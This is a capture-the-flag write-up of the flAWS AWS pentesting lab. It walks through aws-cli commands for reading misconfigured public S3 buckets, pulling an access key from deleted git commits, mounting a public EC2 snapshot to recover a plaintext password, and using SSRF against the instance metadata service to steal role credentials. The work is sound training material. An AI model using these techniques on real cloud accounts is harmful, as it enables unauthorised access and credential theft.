CTF-Writeups/AWS CTF/fLAWS/fLAWS.md
2022-09-03 14:03:14 +05:00

12 KiB

flAWS

flAWS is a CTF focused for teaching about AWS (Amazon Web Services) pentesting, which introduces issues in AWS and to exploit them, it's hosted on http://flaws.cloud/ so we don't need to setup anything for AWS

Level 1

This level is buckets of fun. See if you can find the first sub-domain

Using the url which is given to us, we can check the response of the url with curl

Here it shows AmazonS3 in server header in the response, Level 1 is about finding the subdomain of the domain given from where we can access S3, which is a key-value store, for storing objects in amazon which is used for storing files, these objects are stored in a container known as buckets

The url of s3 bucket is in these formats

As from the server response eariler, the site is being hosted as s3 bucket, so visiting http://flaws.cloud.s3.amazonaws.com/ will show us the bucket, and the reaons why it will show us the contents is because it's allowed for un-authorized access

This shows five html files

  • hint1.html
  • hint2.html
  • hint3.html
  • index.html
  • secret-dd02c7c.html

Having secret-dd02c7c.html , we don't really need to go through the hint files as we already have found about s3 and have the secret file

We can also access the bucket through command line as well using aws-cli

If you encounter this error, it can be resolved by installing urlib version 1.26.7

To list the contents from s3 bucket the syntax is like this also we are using --no-sign-request because we don't want any authentication and the region is where the bucket is being hosted from

aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2 

We can download the secret file like this

aws s3 cp s3://flaws.cloud/hint1.html --no-sign-request --region us-west-2 .

Or if we want we can use cp and --recursive to download all files from the bucket on to our local machine

aws s3 cp s3://flaws.cloud/ --no-sign-request --region us-west-2 . --recursive 

Level 2

Accessing a bucket with any valid AWS credential

There can be a mis-configuation in buckets to allow anyone to view bucket with any valid AWS credential, so if we try accessing this bucket http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud.s3.amazonaws.com/ it will give access denied to bucket with un-authorized access

For this we need to now create an aws free tier account which needs credit card information

After filling up the details we'll have the account registered, login as a root user account

After logging in, we'll be brought to aws dashboard

Now we need to setup AWS access key, to do that visit Security Credentials

After closing this pop up, it will make the key active

We can set the AWS key with aws configure

These keys are saved in ~/.aws/credentials

And now we can acess the level 2 bucket

Download the secret html file

This will lead us to level 3

Level 3

Finding and acessing the bucket with authorized AWS key

Let's access the bucket by going to this url http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud.s3.amazonaws.com/

This gives us unauthorize access to bucket having a git repo, we can download all files through --recursive

aws s3 cp s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ --region us-west-2 . --recursive
Using `git show` in `.git` directory we can see the commit which was deleted having the AWS access key With `aws s3 ls` we can list all the buckets but they are not accessible with this key ## Level 4

Accessing EC2 instance

We are given a url which is running a web site hosted from ec2 instance http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud

We can't access the bucket without an authorized AWS key

An ec2 instance is a virtual server on aws, you can think of it as a linux server but being hosted and using aws infrastructre

This level mentions about a backup of ec2 instance was made

It'll be useful to know that a snapshot was made of that EC2 shortly after nginx was setup on it.

We can list the ec2 instances snapshots but before that we need the id and we can get that with

aws sts get-caller-identity --output text

To list the ec2 snapshots

aws ec2 describe-snapshots --owner-id 975426262029 --output text --region us-west-2

But form the output we can't understand it properly so instead we can just output it with json format

Also to note that the reason we are specifying the --owner-id is because we want the snaphost which is owned by this AWS key, if we don't sepcfiy the id it will list all the snapshots which isn't owned by this user or id

To mount this, we need to create a volume of this snapshot to our AWS user account and to do that we need to again configure the AWS key but this time giving it a profile name so we can reference it

aws ec2 create-volume --profile arz --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

We can check the status of the volume if it has been created

aws ec2 describe-volumes --region us-west-2 --filters Name=volume-id,Values=vol-067022c1d15d83787 --profile arz 

Now from AWS dashboard, go to Services -> Compute -> EC2 -> EBS and Volumes there you'll see the volume created from the snapshot

Go to Instances , make sure to edit network settings to create the instance in us-west-2a

Create a key pair

Then launch then instance

Clicking on the instance, we can find the public IP and DNS

Now simply just login with the private key (pem) which was downloaded after setting the key pair using the username ec2-user which is the default user ( you can change that if you want)

Attach the volume to this instance

Run blkid to see the device number and then mount it with mount

This reveals the username `flaws` with password `nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M`, with the credentials we can login to the nginx web page amd find the link to the next level

Level 5

Accessing buckets through HTTP proxy

This EC2 instance is using nginx as a proxy

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/

If we make a request to 127.0.0.1 which should see the index page for the level5 page for completing level4

Which means there's SSRF here through which can make a request to 169.254.169.254 which is a reserverd IP for EC2 meta data service known as maigc IP

We want the latest meta data from where we'll get identity-credentials and the role name flaws having the AWS access key

Having the access keys, we can configure them in the default profile

But we won't be able to view the user id and the bucket becasuse it will need a token as from the error it tells that token is invalid

The token can be added in ~/.aws/credentials

And now we'll be able to use the AWS access key with the token added

In the bucket we see ddcc78ff/ so we'll just download the files recusively

Opening the index.html we'll get the page of the next challenge

Level 6

Enumerating AWS Policies

We are given AWS access key , make sure to remove the previous token

On Checkinng the bucket, we'll get an access denied error

As the challenge is about policies , we can try playing with iam which is Identity and Acess Management

aws iam list-roles
aws iam list-attached-user-policies --user-name "level6

``

This user has Security Audit and api gateway policies attached, having api gateway policy we can see the function Level6 in lambda, lambda is used for running application or some code as you can see here that in runtime it's showing python2.7

We need to get the API id of Level6 function

aws lambda get-policy --function-name Level6

Through this id we can list the stage name with get-stages

aws apigateway get-stages --rest-api-id s33ppypa75 

This makes the URL of the api

http://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

On visting this link will mark the finish of fLAWS challenge

References